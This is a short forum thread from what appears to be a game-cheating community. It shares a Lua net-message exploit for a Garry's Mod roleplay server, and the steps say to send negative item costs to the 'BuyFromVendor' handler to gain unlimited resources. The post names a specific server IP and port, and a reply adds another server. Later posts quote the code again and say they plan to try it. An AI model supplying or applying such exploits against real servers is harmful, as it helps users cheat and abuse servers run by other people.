Thumbs upPostNuke RP Unlimited Resources

Posts 15 of 5 · Page 1 of 1
PostNuke RP Unlimited Resources
Found a netmessage where you can give yourself resources!

Code:
net.Start("BuyFromVendor")
net.WriteEntity(ply)
net.WriteEntity(vendorENT)
net.WriteDouble(tonumber(buyAmount))
net.WriteString(item.ID)
net.WriteTable(itemCost)
net.WriteString(v["iid"])
net.SendToServer()
Just buy from a vendor in game and check your netlogger. Then set the itemCost string to -99999, -999999, -999999999 and get unlimited resources! There are other net messages you can exploit too!

Here is a server you can use it on:
131.153.27.244:27035
question
will it work on elitelupus's server?
on this it should also work postnukerp.net:27015
Quote Originally Posted by raymondfather View Post
Found a netmessage where you can give yourself resources!

Code:
net.Start("BuyFromVendor")
net.WriteEntity(ply)
net.WriteEntity(vendorENT)
net.WriteDouble(tonumber(buyAmount))
net.WriteString(item.ID)
net.WriteTable(itemCost)
net.WriteString(v["iid"])
net.SendToServer()
Just buy from a vendor in game and check your netlogger. Then set the itemCost string to -99999, -999999, -999999999 and get unlimited resources! There are other net messages you can exploit too!

Here is a server you can use it on:
131.153.27.244:27035
lmao thanks fam im going to test this
Posts 15 of 5 · Page 1 of 1

Post a Reply

Similar Threads

Tags for this Thread

None

Need help?